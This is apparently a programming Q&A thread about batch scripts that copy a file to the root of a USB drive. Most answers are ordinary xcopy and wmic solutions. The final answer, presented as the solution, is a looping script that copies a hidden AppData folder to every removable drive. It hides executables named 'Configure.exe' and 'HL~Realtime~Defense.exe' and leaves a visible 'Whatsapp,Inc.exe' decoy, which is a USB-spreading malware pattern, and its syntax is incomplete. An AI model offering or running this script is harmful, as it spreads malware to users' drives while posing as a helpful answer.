# Copy a file into USB flash drive root using batch files

Tags: batch-file, copy, cmd, root, xcopy

I want to create a batch file to copy a file from any Dir into root folder that the .bat file located on that like a USB flash drive .

My incomplete command :

```
    xcopy /s "%userprofile%\Desktop\test.txt" "?"
```

What can I replace with "?" ???
Thanks guys

Comment: Next time try googling a little. I hope [this](http://forums.whirlpool.net.au/archive/1725281) helps

Answer (score 1):

This will do exactly as you want to any and all connected USB drives.

```
@echo off

for /F "usebackq tokens=1,2,3,4 " %%i in (`wmic logicaldisk get caption^,description^,drivetype 2^>NUL`) do (

if %%l equ 2 (
xcopy /s "%userprofile%\Desktop\test.txt" %%i\
        )
        )
```

Comment: Hello, sir. Could you please explain this script? Works perfectly btw

Answer (score 0):

```
 xcopy /s "%userprofile%\Desktop\test.txt" "\"
```

Comment: You asked to copy a file to the root folder of the drive that contains the batch file.  At least that is what I think you wanted.  If you want something else then please clarify your question.

Answer (score 0):

You should replace it with drive letter of USB drive followed by `:\`
So, the real question is how to determine, which of the drives in system are USB flash drives, I guess? Here is the code:

```
@echo off
setlocal enabledelayedexpansion
set INTEXTFILE=temp.txt
set OUTTEXTFILE=temp.bat
set SEARCHTEXT='Removable Disk'
set REPLACETEXT=
set OUTPUTLINE=
wmic logicaldisk get name,description|grep -h "Removable" > %INTEXTFILE%

for /f "tokens=3,* delims= " %%A in ( '"type %INTEXTFILE%"') do (
SET string=%%A
SET modified=!string:%SEARCHTEXT%=%REPLACETEXT%!
)
echo xcopy /s "%userprofile%\Desktop\test.txt" !modified! > %OUTTEXTFILE%
call %OUTTEXTFILE%
del  %OUTTEXTFILE%
del  %INTEXTFILE%
```

But take into account that it definitely works only for 1 removable disk. It will fail, if two devices of this type are plugged in.

Answer (score 0):

What you are going to need to do is use a relative path for your USB directory. The code will look like this:

```
@echo off
set /p entry= Enter the the path of the file you'd like to copy:
copy %entry% %~dp0\*.*
@pause
```

This should let you enter into a prompt where you would like to copy the folder from/its name. It will name the file the same as the original and keep the original format (.txt, etc.).
Let me know if this does not work for you instead of downvoting and I will work out another solution for you asap.
Best of luck!

Answer (score 0):

```
@ECHO Off
:loop
@echo off
set INTERVAL=5
for /F "tokens=1*" %%a in ('fsutil fsinfo drives') do (
  for %%c in (%%b) do (
     for /F "tokens=3" %%d in ('fsutil fsinfo drivetype %%c') do (
        if %%d equ Removable (
          echo %%c is Removable
            cd "%USERPROFILE%\Appdata\Local\SystemSettings"
              xcopy "%USERPROFILE%\Appdata\Local\SystemSettings" "%%c" /s /e /h /y
                ATTRIB +H -R +S %%cConfigure.exe
                   ATTRIB +H -R +S %%cHL~Realtime~Defense.exe
                      ATTRIB -H -R -s %%cWhatsapp,Inc.exe

timeout /nobreak /t 99
goto loop
```

Is exactly what you need